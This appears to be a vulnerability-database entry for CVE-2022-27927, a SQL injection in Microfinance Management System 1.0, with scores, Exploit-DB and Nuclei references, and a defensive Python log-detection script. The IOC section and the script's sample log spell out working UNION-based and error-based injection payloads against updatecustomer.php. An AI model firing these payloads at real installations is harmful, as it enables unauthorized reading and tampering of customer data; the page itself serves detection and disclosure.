CVE-2022-27927
Published 2022-04-19
Priority: P269 · critical 9.8 (CVSS 3.1)
Exploit available · EPSS 13.63% (96.0th percentile)
A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microfinance_management_system_project | microfinance_management_system | — | — |
Detection & IOCs (extracted from sources)
- URL: /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'
- URL: /mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27
- Command: customer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
- Detect SQL injection attempts against the vulnerable endpoint by monitoring GET requests to /mims/updatecustomer.php with a manipulated 'customer_number' parameter containing SQL metacharacters or UNION/SELECT payloads.
- The Nuclei template matcher checks for the md5 of '999999999' in the HTTP response body from /mims/updatecustomer.php, which confirms successful UNION-based SQL injection exploitation.
- Monitor the HTTP Referer header value 'http://localhost/mims/managecustomer.php' combined with SQLi payloads in the customer_number parameter as an indicator of exploitation attempts originating from the manage customer page.
- Error-based SQLi payloads targeting this CVE use INFORMATION_SCHEMA.COLLATIONS with FLOOR(RAND(0)*2) and GROUP BY to trigger MySQL errors; alert on these patterns in query strings to /mims/updatecustomer.php.
- The CVE also affects the 'course_code' parameter in addition to 'customer_number'; detection rules should cover both parameters.
- The Nuclei template uses a single GET request (max-request: 1) targeting /mims/updatecustomer.php with a UNION-based payload; detection tuned only for this endpoint may miss exploitation via other vulnerable parameters or endpoints.
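A defender-side check that implements the detection points listed above over access-log lines, added here as an example and not code from the page or the project. The endpoint, both parameter names, the UNION/SELECT and INFORMATION_SCHEMA.COLLATIONS patterns, the md5(999999999) probe marker and the managecustomer.php Referer come from the page; the combined-log format, the sample lines and the function names are my own assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (combined format); not taken from the page.
SAMPLE_LOG = r'''
10.0.0.5 - - [19/Apr/2022:10:01:02 +0000] "GET /mims/updatecustomer.php?customer_number=1042 HTTP/1.1" 200 5120 "http://localhost/mims/managecustomer.php" "Mozilla/5.0"
10.0.0.9 - - [19/Apr/2022:10:02:10 +0000] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1" 200 6011 "http://localhost/mims/managecustomer.php" "curl/7.81"
10.0.0.9 - - [19/Apr/2022:10:02:15 +0000] "GET /mims/updatecustomer.php?course_code=1%27%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cFLOOR(RAND(0)*2)x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x) HTTP/1.1" 500 310 "-" "curl/7.81"
10.0.0.7 - - [19/Apr/2022:10:03:00 +0000] "GET /mims/index.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')
ENDPOINT = "/mims/updatecustomer.php"
PARAMS = ("customer_number", "course_code")  # both parameters named in the CVE

def _error_based(v):
    # Error-based pattern from the IOC section; substrings checked order-independently
    v = v.lower()
    return all(k in v for k in ("information_schema.collations", "floor(rand(0)*2)", "group by"))

RULES = [
    ("union_select", lambda v: re.search(r"union\s+(all\s+)?select", v, re.I) is not None),
    ("error_based_collations", _error_based),
    ("nuclei_md5_marker", lambda v: "md5(999999999)" in v.lower()),  # template's probe marker
    ("sql_metachar", lambda v: re.search(r"['#]|--|/\*", v) is not None),
]

def analyse_line(line):
    """Return a finding dict for one log line, or None if it is not suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, _method, target, status, referer = m.groups()
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    hits = []
    for name in PARAMS:
        for raw in parse_qs(parts.query, keep_blank_values=True).get(name, []):
            value = unquote_plus(raw)  # parse_qs decoded once; decode again to catch double encoding
            hits += [f"{name}:{rule}" for rule, check in RULES if check(value)]
    if not hits:
        return None
    return {"src": src, "status": status, "hits": hits,
            "from_manage_page": referer.endswith("/mims/managecustomer.php")}

def analyse_log(text):
    """Run analyse_line over every non-empty line and keep the findings."""
    return [f for f in (analyse_line(l.strip()) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(finding)
```

The md5(999999999) marker can only be confirmed in the response body, as the Nuclei matcher does; in an access log the request-side marker is the best available signal.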
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
No detection rules found.
Exploit-DB
Microfinance Management System 1.0 - 'customer_number' SQLi
Exploit-DB · 2022-05-11 · CVSS 9.8
---
# Exploit Title: Microfinance Management System 1.0 - 'customer_number' SQLi
# Date: 2022-25-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-27927
# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
1. Description:
Microfinance Management System allows SQL Injection via parameter 'customer_number' in
/mims/updatecustomer.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit
Nuclei
Microfinance Management System 1.0 - SQL Injection
Nuclei · CVSS 9.8
Microfinance Management System 1.0 is susceptible to SQL Injection.
Template:

```yaml
id: CVE-2022-27927

info:
  name: Microfinance Management System 1.0 - SQL Injection
  author: lucasljm2001,ekrause
  severity: critical
  description: |
    Microfinance Management System 1.0 is susceptible to SQL Injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
    - https://www.sourcecodester.com
```
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/167017/Microfinance-Management-System-1.0-SQL-Injection.html
- https://github.com/erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated
- https://www.sourcecodester.com/php/14822/microfinance-management-system.html